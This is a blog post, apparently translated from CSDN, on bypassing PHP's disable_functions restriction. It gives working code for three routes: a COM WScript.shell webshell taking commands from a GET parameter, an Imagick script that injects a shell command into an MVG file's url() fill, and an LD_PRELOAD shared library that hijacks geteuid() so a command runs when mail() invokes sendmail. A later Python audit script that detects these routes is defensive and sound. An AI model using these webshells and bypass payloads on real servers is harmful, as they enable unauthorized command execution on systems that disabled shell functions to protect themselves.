PHP bypass disable_function restrictions (a)

Test environment php 5.4.5

0x01 Bypass using system components

 1. Windows COM component (PHP 5.4; on newer PHP versions you have to add the extension yourself)

(COM components were originally designed for cross-language reuse of program components.)

test:

<?php
$command = $_GET['a'];
$wsh = new COM('WScript.shell'); // create a COM object; Shell.Application also works
$exec = $wsh->exec("cmd /c " . $command); // call the object's method to execute the command
$stdout = $exec->StdOut();
$stroutput = $stdout->ReadAll();
echo $stroutput;
?>

A thorough fix is to delete wshom.ocx from the System32 directory.

2. Use an ImageMagick vulnerability to bypass disable_functions

ImageMagick is a powerful, stable, open-source toolkit and development library that can read, write and process image files in more than 89 basic formats.
If you see it listed in phpinfo, you can try the following.

Official download address: https://imagemagick.org

Extension downloads:

https://pecl.php.net/package/imagick

https://windows.php.net/downloads/pecl/releases/imagick/3.4.1/

<?php
echo "Disable Functions: " . ini_get('disable_functions') . "\n";

// command comes from argv on the CLI, from ?cmd= through the web server
$command = PHP_SAPI == 'cli' ? (isset($argv[1]) ? $argv[1] : '') : (isset($_GET['cmd']) ? $_GET['cmd'] : '');
if ($command == '') {
    $command = 'id';
}

// MVG file whose url() fill is passed to a shell by the vulnerable coder
$exploit = <<<EOF
push graphic-context
viewbox 0 0 640 480
fill 'url(https://example.com/image.jpg"|$command")'
pop graphic-context
EOF;

file_put_contents("KKKK.mvg", $exploit);
$thumb = new Imagick();
$thumb->readImage('KKKK.mvg');
$thumb->writeImage('KKKK.png');
$thumb->clear();
$thumb->destroy();
unlink("KKKK.mvg");
unlink("KKKK.png");
?>

3. Bypass using the LD_PRELOAD environment variable

When PHP's mail() function runs it invokes the system's default program /usr/sbin/sendmail. If we can hijack the sendmail program, then simply calling mail() is enough to trigger our code.

LD_PRELOAD is an interesting environment variable on Linux: it lets you name a dynamic shared library that is loaded before any other when a program starts. It is mainly used to selectively load a different dynamic library for a function of the same name. Through this variable we can load additional dynamic libraries between the main program and its own libraries, and even override normal library functions. On the one hand this lets you substitute your own or a better implementation of a function (without needing the other side's source code); on the other hand it lets you inject code into someone else's program for a specific purpose.

Example: testing with the mail() function

#include <stdlib.h>
#include <stdio.h>
#include <string.h>

/* Runs once: the marker file /tmp/2.txt stops the payload firing on every call. */
void payload() {
    FILE *fp = fopen("/tmp/2.txt", "w");
    if (fp != NULL) {
        fclose(fp);
    }
    system("mkdir /var/www/html/test");
}

/* sendmail calls geteuid(); the preloaded library's copy is resolved first. */
int geteuid() {
    FILE *fp1 = fopen("/tmp/2.txt", "r");
    if (fp1 != NULL) {
        fclose(fp1);
        return 552;
    } else {
        payload();
        return 552;
    }
}

Compile it into a dynamic shared library:

gcc -c -fPIC a.c -o a
gcc -shared a -o a.so

Set LD_PRELOAD with putenv() so that our library is loaded first, then call mail() from the webshell to trigger it. Result:

<?php
putenv("LD_PRELOAD=/var/www/html/a.so");
mail("[email protected]", "", "", "", "");
?>
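A defensive counterpart to the three techniques above, added here as an example and not part of the original post: a small Python audit that parses a php.ini disable_functions / disable_classes list, reports which of the bypass routes on this page are still reachable on a given PHP build, and flags their indicators in PHP source files. The route labels, the regular expressions, and the sample ini string and webshell text are constructed for this example; the function, class and extension names (putenv, mail, COM, Imagick, com_dotnet, imagick) are PHP's own.

```python
"""Audit disable_functions/disable_classes against the bypass routes described
on this page, and scan PHP source for their indicators. Example code; all
sample inputs are constructed."""
import re

# What each bypass route needs in order to be reachable. Route labels are ours;
# the function/class/extension names are the real PHP names.
BYPASS_ROUTES = {
    "COM object (WScript.Shell)": {
        "functions": set(),
        "classes": {"com"},
        "extensions": {"com_dotnet"},   # Windows-only extension that provides COM
    },
    "Imagick MVG coder": {
        "functions": set(),
        "classes": {"imagick"},
        "extensions": {"imagick"},
    },
    "LD_PRELOAD via putenv() + mail()": {
        "functions": {"putenv", "mail"},  # putenv sets the variable, mail() spawns sendmail
        "classes": set(),
        "extensions": set(),
    },
}

# Source-level indicators of the three webshell shapes shown on this page.
INDICATORS = [
    ("putenv(LD_PRELOAD)", re.compile(r"putenv\s*\(\s*['\"]LD_PRELOAD", re.I)),
    ("new COM(...)", re.compile(r"new\s+COM\s*\(", re.I)),
    ("Imagick reads .mvg", re.compile(r"readImage\s*\(\s*['\"][^'\"]*\.mvg", re.I)),
    ("MVG graphic-context block", re.compile(r"push\s+graphic-context", re.I)),
]


def parse_name_list(value):
    """Split a php.ini list such as 'exec, shell_exec,system' into lowercase names."""
    return {name.strip().lower() for name in re.split(r"[,\s]+", value) if name.strip()}


def audit(disable_functions, disable_classes="", loaded_extensions=()):
    """Return {route: {"reachable": bool, "disable_functions": [...], "disable_classes": [...]}}.

    A route is blocked when any function or class it needs is disabled, or an
    extension it needs is not loaded. The lists name what is still enabled and
    would have to be added to php.ini to close the route.
    """
    disabled_fn = parse_name_list(disable_functions)
    disabled_cls = parse_name_list(disable_classes)
    loaded = {e.lower() for e in loaded_extensions}
    report = {}
    for route, needs in BYPASS_ROUTES.items():
        fn_blocked = bool(needs["functions"] & disabled_fn)
        cls_blocked = bool(needs["classes"] & disabled_cls)
        ext_blocked = bool(needs["extensions"] - loaded)
        report[route] = {
            "reachable": not (fn_blocked or cls_blocked or ext_blocked),
            "disable_functions": sorted(needs["functions"] - disabled_fn),
            "disable_classes": sorted(needs["classes"] - disabled_cls),
        }
    return report


def scan_php_source(source):
    """Return [(line_number, indicator_label)] for every line matching an indicator."""
    hits = []
    for lineno, line in enumerate(source.splitlines(), start=1):
        for label, pattern in INDICATORS:
            if pattern.search(line):
                hits.append((lineno, label))
    return hits


# Constructed sample inputs: a typical "shell functions only" hardening line,
# and a webshell in the shape of the snippets above.
SAMPLE_INI = "exec,shell_exec,system,passthru,proc_open,popen"  # putenv and mail still allowed
HARDENED_INI = SAMPLE_INI + ",putenv,mail"
SAMPLE_SOURCE = """<?php
putenv("LD_PRELOAD=/var/www/html/a.so");
mail("[email protected]","","","","");
$wsh = new COM('WScript.shell');
"""

if __name__ == "__main__":
    for route, result in audit(SAMPLE_INI, loaded_extensions=("imagick",)).items():
        state = "REACHABLE" if result["reachable"] else "blocked"
        print(f"{route}: {state} (still enabled: {result['disable_functions']} {result['disable_classes']})")
    print(scan_php_source(SAMPLE_SOURCE))
```

On a live host, pass ini_get('disable_functions'), ini_get('disable_classes') and get_loaded_extensions() from PHP into the audit; the report then says directly whether adding putenv and mail to disable_functions, adding COM or Imagick to disable_classes, or unloading the extension is what closes each route.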

posted @ 2019-05-29 15:30 Mr. Ching

Origin blog.csdn.net/qq_17204441/article/details/90704743